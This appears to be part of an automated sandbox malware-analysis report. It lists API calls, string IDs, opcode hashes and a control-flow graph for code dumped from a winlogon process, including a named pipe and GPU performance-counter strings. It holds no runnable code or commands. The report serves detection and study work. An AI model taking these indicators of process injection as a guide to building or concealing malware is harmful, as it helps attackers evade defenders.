                                                  • Instruction Fuzzy Hash: 69515E76228F9496EB24CFA6E44C39A77A1F788F9AF148124DE4A07758DF3CC149CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `eh vector constructor iterator'$`virtual displacement map'$or iterator'$r iterator'
                                                  • API String ID: 190073905-2094522767
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: df56a76061b33a4a5b01de3413a16189971b8fb27f548d3c2683b7a4ff839c08
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: 5881F46DA16E716AFF50AFEDA84D39962D0EB95783F44C015AB09837D6DF38C842CB00

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 363 225dc64d778-225dc64d79a GetLastError 364 225dc64d7b9-225dc64d7c4 FlsSetValue 363->364 365 225dc64d79c-225dc64d7a7 FlsGetValue 363->365 368 225dc64d7cb-225dc64d7d0 364->368 369 225dc64d7c6-225dc64d7c9 364->369 366 225dc64d7a9-225dc64d7b1 365->366 367 225dc64d7b3 365->367 370 225dc64d825-225dc64d830 SetLastError 366->370 367->364 371 225dc64d7d5 call 225dc64e01c 368->371 369->370 372 225dc64d845-225dc64d85b call 225dc64d098 370->372 373 225dc64d832-225dc64d844 370->373 374 225dc64d7da-225dc64d7e6 371->374 385 225dc64d878-225dc64d883 FlsSetValue 372->385 386 225dc64d85d-225dc64d868 FlsGetValue 372->386 375 225dc64d7f8-225dc64d802 FlsSetValue 374->375 376 225dc64d7e8-225dc64d7ef FlsSetValue 374->376 379 225dc64d816-225dc64d820 call 225dc64d4e4 call 225dc64e094 375->379 380 225dc64d804-225dc64d814 FlsSetValue 375->380 378 225dc64d7f1-225dc64d7f6 call 225dc64e094 376->378 378->369 379->370 380->378 391 225dc64d885-225dc64d88a 385->391 392 225dc64d8e8-225dc64d8ef call 225dc64d098 385->392 389 225dc64d86a-225dc64d86e 386->389 390 225dc64d872 386->390 389->392 394 225dc64d870 389->394 390->385 396 225dc64d88f call 225dc64e01c 391->396 397 225dc64d8df-225dc64d8e7 394->397 399 225dc64d894-225dc64d8a0 396->399 400 225dc64d8b2-225dc64d8bc FlsSetValue 399->400 401 225dc64d8a2-225dc64d8a9 FlsSetValue 399->401 403 225dc64d8be-225dc64d8ce FlsSetValue 400->403 404 225dc64d8d0-225dc64d8da call 225dc64d4e4 call 225dc64e094 400->404 402 225dc64d8ab-225dc64d8b0 call 225dc64e094 401->402 402->392 403->402 404->397
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D787
                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D79C
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D7BD
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D7EA
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D7FB
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D80C
                                                  • SetLastError.KERNEL32(?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D827
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D85D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64F61C,?,?,?,?,00000225DC64C8EF,?,?,?,?,?,00000225DC647EA0), ref: 00000225DC64D87C
                                                    • Part of subcall function 00000225DC64E01C: HeapAlloc.KERNEL32(?,?,00000000,00000225DC64D952,?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64E071
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D8A4
                                                    • Part of subcall function 00000225DC64E094: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC6463FA), ref: 00000225DC64E0AA
                                                    • Part of subcall function 00000225DC64E094: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC6463FA), ref: 00000225DC64E0B4
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D8B5
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC6513BB,?,?,?,00000225DC650DAC,?,?,?,00000225DC64D19F), ref: 00000225DC64D8C6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction ID: 7919450a34c50655e33a0d8c24be714c18f854e2c676953691209190ae36fbdd
                                                  • Opcode Fuzzy Hash: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction Fuzzy Hash: 27419E2CB0DE3076FA68A7FD955D37932425B857B2F14DBA4A93B0A6C3DE388441C201

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction ID: e5fb20dbb15e25b8c125785785b1620c1811f67dc8fb6ed1710fd0e101618cbc
                                                  • Opcode Fuzzy Hash: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction Fuzzy Hash: 3531D72661CE65A6F720DFAAE80C759B3A0F748FD7F148225DE4943624DF38C155CB40

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction ID: a5ffe0066a5972e9522319152b9a08aeb04783ec944703a357515d4e189529e1
                                                  • Opcode Fuzzy Hash: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction Fuzzy Hash: 08319E79628F65E6E710DFAAE84875A73A0B794F96F188135DE4B43724DF38C445CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction ID: 5fb1a5850df263bdacba4fddcbafc80c885698c103ddd9176454305be14979c9
                                                  • Opcode Fuzzy Hash: 1a69dcc4a857e1a8acaf5f70824e8ee75a6218c9c0f8a8e2485de44cbd3ea7a5
                                                  • Instruction Fuzzy Hash: FAD1D13A601FA09AEF60CFA9D48839D37B0F74979AF108216EF8957B4ADB34C591C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction ID: 0f005375d1fb9152b79317c08e21f05c4ff60ec403d18668979a1a747940147c
                                                  • Opcode Fuzzy Hash: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction Fuzzy Hash: E3D1E63A60CF60A6EB60DFA9D4483AD37A0F79578AF148255EF4A57B56CB34C491C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction ID: 3a7a4550c022cd3c3a48ec13099212b208a294064c7e06beb5e4b1cdd6ae0564
                                                  • Opcode Fuzzy Hash: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction Fuzzy Hash: 5B41D26932DE20B1FA26CBAEA80CB9573D5B745BE2F59C225AD0A47794EF3CC405C301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction ID: 6fef5b8488558cc2b2a79796e979ba4a24f7735baa022cfe65442230ea6e31da
                                                  • Opcode Fuzzy Hash: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction Fuzzy Hash: 92418277228F90D6E760CF65E44879E77A1F388B99F148129DB8A07B58DF38C549CB00
                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC64D12E,?,?,?,?,?,?,?,?,00000225DC64D8ED,?,?,00000001), ref: 00000225DC64D9D7
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64D12E,?,?,?,?,?,?,?,?,00000225DC64D8ED,?,?,00000001), ref: 00000225DC64D9F6
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64D12E,?,?,?,?,?,?,?,?,00000225DC64D8ED,?,?,00000001), ref: 00000225DC64DA1E
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64D12E,?,?,?,?,?,?,?,?,00000225DC64D8ED,?,?,00000001), ref: 00000225DC64DA2F
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64D12E,?,?,?,?,?,?,?,?,00000225DC64D8ED,?,?,00000001), ref: 00000225DC64DA40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction ID: 7ce56ff7fd0e4ddf85d71249511d295e1982da33bdc5df199f633c03df4aa86f
                                                  • Opcode Fuzzy Hash: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction Fuzzy Hash: 8011B918B0DE3061FA5897FDD59D36972425B44BB2F08D7A4A57F477C6DE38C482C201
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\x4childproc
                                                  • API String ID: 166002920-1140171592
                                                  • Opcode ID: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction ID: 61577388e06c2909a97b2cba07b31abfc67d37822d1ce58d11f25d91fcbeb15a
                                                  • Opcode Fuzzy Hash: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction Fuzzy Hash: 55111C7A628B5092F710CB69F40875A77A1F389BD6F648215EA5906AA8CF7CC149CF40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 210e56f449c89a13f5f9b973a8dcf217c545ff540753904b4ec90a7e15d2515b
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: D281252C61CE71A6FB50AFED944D39932D0A786787F14C595DE0A83792DB38C986CF00
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000225DC64A6E7,?,?,?,00000225DC64911C,?,?,?,?,00000225DC648C25), ref: 00000225DC64A5AD
                                                  • GetLastError.KERNEL32(?,?,?,00000225DC64A6E7,?,?,?,00000225DC64911C,?,?,?,?,00000225DC648C25), ref: 00000225DC64A5BB
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000225DC64A6E7,?,?,?,00000225DC64911C,?,?,?,?,00000225DC648C25), ref: 00000225DC64A5E5
                                                  • FreeLibrary.KERNEL32(?,?,?,00000225DC64A6E7,?,?,?,00000225DC64911C,?,?,?,?,00000225DC648C25), ref: 00000225DC64A653
                                                  • GetProcAddress.KERNEL32(?,?,?,00000225DC64A6E7,?,?,?,00000225DC64911C,?,?,?,?,00000225DC648C25), ref: 00000225DC64A65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction ID: 30b499eecc730ba1526595e299266bf1ad059e10e28ec2d2128049c00b3f6f5d
                                                  • Opcode Fuzzy Hash: d13716cb052cff671a6102bc29061a61341be46a7543b943372d3602c3dab51e
                                                  • Instruction Fuzzy Hash: 4D31D43931EE60F1EE169F8AA80876537D4B708BA6F69C625ED1E0B791DF38C445C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction ID: 0bb93aa8ce424f15dd1220d81c70c7c20f3c9e799086b0d1691c799797bfd967
                                                  • Opcode Fuzzy Hash: 404f8ad15a8ca5440fd66a0879b8ed7fae2f87739d18727aa04e6e2736d64f5f
                                                  • Instruction Fuzzy Hash: A1119435334F6096E7608B9AF85871973A0F798FE6F248214EA5E87BA4DF78C444CB40
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64D8FF
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64D935
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64D962
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64D973
                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64D984
                                                  • SetLastError.KERNEL32(?,?,?,00000225DC64E005,?,?,?,?,00000225DC64E0C8), ref: 00000225DC64D99F
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction ID: 904a8fecd9ac52e6562fd304abace2d98db5f6f764fed151895a1bd2fdff8146
                                                  • Opcode Fuzzy Hash: dbd57d8dc0b21b25a460add1d444d3211eb3e7612d5fcd27e023ff0818d74411
                                                  • Instruction Fuzzy Hash: D0119D2870DE70A2FB54A7F9959D32D72826B447B2F04D7A4A97B477D6DE388441C201
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction ID: ec427c2df76e0f5fb030c4821d958bbf26611190c13ba15000dd8a7a1d2d7e21
                                                  • Opcode Fuzzy Hash: 6e434f9027214566f227db2d997bb0a869563547e9da787854957d847e80d4fa
                                                  • Instruction Fuzzy Hash: 31016D69328E5092EB14DB96A85875963A1F788FD1F588034DE8A43754DE3CC585CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
